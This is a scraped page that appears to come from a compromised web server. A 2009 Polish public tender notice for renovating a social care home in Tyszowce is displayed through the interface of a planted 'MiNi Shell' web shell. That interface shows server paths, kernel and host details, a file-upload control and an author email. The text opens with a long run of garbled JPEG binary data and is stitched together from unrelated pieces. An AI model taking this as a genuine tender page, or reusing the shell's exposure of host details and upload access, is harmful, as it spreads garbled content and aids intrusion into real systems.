JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090724/253586-N-2009.html

<p class="kh_header"><b>Tyszowce: Termomodernizacja i remont budynku Domu Pomocy Społecznej przy ul. Wielkiej 101 Tyszowce</b><br>
<b>Numer ogłoszenia: 253586 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Wielka 101, 22-630 Tyszowce, woj. lubelskie, tel. 084 6619277, 6619279, faks 084 6619278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.dps-tyszowce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja i remont budynku Domu Pomocy Społecznej przy ul. Wielkiej 101 Tyszowce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w zakresie termomodernizacji i remontu budynku Domu Pomocy Społecznej przy ul. Wielkiej 101 w Tyszowcach.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-7, 45.32.10.00-3, 45.32.00.00-6, 45.33.11.00-7, 45.31.51.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala sie wadium w wysokości 50000.00zł (słownie pięćdziesiat tysiecy zł)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy spełniający warunki udziału w postępowaniu, o których    
       mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, nie podlegający wykluczeniu na podstawie 
      art. 24 ust. 1 i 2 ustawy Pzp, tj:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają   obowiązek posiadania takich uprawnień,
b)	 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do 
       wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
       technicznego i osób zdolnych do wykonania zamówienia,
c)	 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	 nie podlegają  wykluczeniu z postępowania o udzielenie zamówienia w oparciu o art. 24 ust. 1 i 2 ustawy Pzp,

Wwykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia ,
       a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 robotę odpowiadającą       
       swoim rodzajem robotom budowlanym - termomodernizacji budynków, modernizacji kotłowni
       i instalacji kolektorów słonecznych - stanowiącym przedmiot zamówienia o wartości nie mniejszej niż      
       1 000 000,00 zł,
Dysponują osobami zdolnymi do wykonania zamówienia, posiadającymi kwalifikacje zawodowe konieczne 
       do realizacji zamówienia w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. 
        nr 156  poz 1118 z późn. zm.), a w szczególności:
 -     dysponują osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności 
        konstrukcyjno - budowlanej, 
 -     dysponują osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacji 
        sanitarnych,
 -     dysponują osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacji 
        elektrycznych, która posiada uprawnienia SEP- 1 kV D i E wraz z uprawnieniami do wykonania pomiarów 
        ochronnych.   
        [ kierownik robót budowlanych musi posiadać aktualne zaświadczenie, że jest 
        członkiem właściwej izby samorządu zawodowego oraz posiada ubezpieczenie od odpowiedzialności 
        cywilnej, o którym mowa w art. 6, ust. 2 ustawy z dnia 15.12.2000 r. o samorządach zawodowych 
        architektów, inżynierów budownictwa i urbanistów.] 
                        Jeżeli wykonawca nie dysponuje w/w osobami, to przedstawi pisemne zobowiązanie innych   
        podmiotów do udostępnienia w/w osób, które będzie uczestniczyć w realizacji zamówienia.
 Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.:
-	 posiada dostęp do środków finansowych lub zdolność kredytową na realizację zamówienia, w wysokości  nie mniejszej niż  500 000,00PLN.
 Wykonawca musi posiadać polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest      
       ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
Wniesienie wadium w wysokości 50 000 złotych w formie i na warunkach określonych w pkt 8 SIWZ. 
       Zamawiający dokona oceny spełnienia powyższych warunków metodą : spełnia lub nie spełnia, na podstawie 
       oświadczeń i dokumentów składanych przez Wykonawców.
       Za spełniającego warunki udziału w postępowaniu uznany zostanie Wykonawca, który złoży oświadczenia i   
       dokumenty, o których mowa w pkt 6 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.1. Oświadczenie Wykonawcy - wypełnione i podpisane przez Wykonawcę lub osoby upoważnione do 
        reprezentowania Wykonawcy.  Pełnomocnicy powinni dołączyć upoważnienie do reprezentowania 
        wykonawcę,  jeżeli to nie wynika z innych  dokumentów, np. z rejestru sądowego. Druk oświadczenia stanowi 
        załącznik Nr 7  do specyfikacji) albo przez Pełnomocnika reprezentującego Wykonawców wspólnie 
        ubiegających się o udzielenie zamówienia (na druku stanowiącym załącznik nr 8 do specyfikacji).
1.2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności 
        gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności 
        gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.3.Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz oddziału Zakładu Ubezpieczeń 
        Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających, że Wykonawca nie zalega 
        w  opłacaniu podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że 
        uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
        wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące 
       przed upływem terminu składania ofert.
1.4.Wykaz wykonanych robót budowlanych (przynajmniej jednej) w okresie ostatnich pięciu lat przed 
        dniem  wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -      w tym okresie, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot 
        zamówienia, tj.:  - termomodernizacje i remont budynków , modernizacji kotłowni min. 100 kW i 
        instalacja kolektorów słonecznych - o łącznej wartości nie mniejszej niż 1 000 000,00 zł , z podaniem ich 
        wartości oraz daty i miejsca wykonania (wypełniony wg wzoru stanowiącego zał. nr 10 do SIWZ) oraz 
        dokumenty potwierdzające, że roboty te zostały wykonane należycie ( np. referencje, protokoły odbioru 
        robót ).
1.5.Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w 
        wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i 
        wykształcenia niezbędnych do wykonania  zamówienia, a także zakresu wykonywanych przez nie czynności    
        (wg wzoru stanowiącego zał. nr 11 )   
        Dokumenty stwierdzające, że osoby , które będą uczestniczyć bezpośrednio w wykonywaniu zamówienia, 
         posiadają wymagane uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-
         budowlanej, sanitarnej, elektrycznej wraz z aktualnym zaświadczeniem z właściwej izby samorządu 
         budowlanego, potwierdzającym, że wskazana powyżej osoba jest członkiem właściwej izby samorządu 
         zawodowego oraz posiada ubezpieczenie od odpowiedzialności cywilnej, o którym mowa w art. 6 ust. 2 
         ustawy o samorządach zawodowych architektów, inżynierów budownictwa i urbanistów, lub pisemne 
         zobowiązanie innego podmiotu do udostępnienia osoby posiadającej wymagane uprawnienia i staż  do 
         kierowania robotami budowlanymi.
1.6.Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,
         jeżeli w wykazie o którym mowa w pkt.6.1.5. wykonawca wskazał osoby, którymi będzie dysponował; 
1.7Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada 
         rachunek, potwierdzająca wysokość posiadanych środków finansowych - co najmniej  500.000 zł lub 
         zdolność kredytowej w wysokości  500 000 zł, wystawiona nie wcześniej niż 3 miesiące przed upływem 
         terminu składania ofert. 
1.8.Polisa ubezpieczeniowa, a przypadku jej braku inny dokument potwierdzający, że Wykonawca jest 
         ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
2.1 Wykonawca jest zobowiązany złożyć również w ofercie:
2.2. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy 
          w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie 
          zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji 
          działalności gospodarczej.
2.3. formularz ofertowy - (załącznik. Nr 6 do SIWZ),
2.4. kosztorysy ofertowe sporządzone w oparciu o przedmiary robót, projekt budowlany, projekt wykonawczy.
2.5. Wzór umowy (załącznik. Nr 9) parafowany przez Wykonawcę, co stanowi zobowiązanie się Wykonawcy    
          do zawarcia umowy sporządzonej zgodnie ze projektem umowy dołączonym do SIWZ.
2.6. Kserokopię dowodu wniesienia wadium w wysokości 50 000 złotych w formie i na warunkach określonych 
           w pkt. 8 SIWZ. 
3.1 Forma dokumentów:
3.2Wszystkie dokumenty muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za 
         zgodność z oryginałem przez osoby upoważnione do reprezentowania Wykonawcy na każdej zapisanej 
         stronie poświadczanego dokumentu. Powyższy zapis nie dotyczy pełnomocnictw, które muszą być 
         przedłożone wyłącznie w formie oryginału lub kopii potwierdzonej notarialnie.
3.3.Gdy przedstawiona kserokopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości, a 
         zamawiający nie może sprawdzić jej prawdziwości w inny sposób, może on zażądać przedstawienia 
         oryginału lub notarialnie potwierdzonej kopii dokumentu.
3.4.Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym 
         przez osoby upoważnione do reprezentowania Wykonawcy.
3.5W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, poświadczenia  za 
         zgodność z oryginałem winien dokonać Pełnomocnik.
4.1	  Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 23 ust. 1 ustawy    
         Pzp.
4.2Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. wspólnicy spółki cywilnej 
         lub członkowie konsorcjum) są zobowiązani ustanowić pełnomocnika do reprezentowania ich w 
         postępowaniu albo pełnomocnika do reprezentowania ich w postępowaniu i do zawarcia umowy w 
         sprawie przedmiotowego zamówienia publicznego. Pełnomocnictwo w formie oryginału lub jego notarialny 
         odpis musi znajdować się w ofercie wspólnej wykonawców.
4.3W takim przypadku - oprócz dokumentów wymienionych specyfikacji - wykonawcy        
         wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia  w ofercie 
         pełnomocnictwa ustanawiającego  pełnomocnika, o którym mowa w specyfikacji.
         Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do 
         reprezentowania w postępowaniu i zawarcia umowy.
4.4.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają dokumenty 
        (podpisane przez ustanowionego Pełnomocnika lub potwierdzone przez niego za zgodność z oryginałem):
4.5.Wszelka  korespondencja  oraz  rozliczenia  dokonywane  będą  wyłącznie  z  Pełnomocnikiem.
4.6Wykonawcy składający ofertę wspólną podlegają wykluczeniu z postępowania, gdy okoliczność skutkująca 
         wykluczeniem Wykonawcy dotyczy któregokolwiek z nich..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dps-tyszowce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej ul. Wielka 101 22-630 Tyszowce.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2009 godzina 11:00, miejsce: Dom pomocy Społecznej ul. Wielka 101, 22-630 Tyszowce sekretariat DPS w dni robocze od poniedziałku do piatku  w godz. 7.00-15.00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com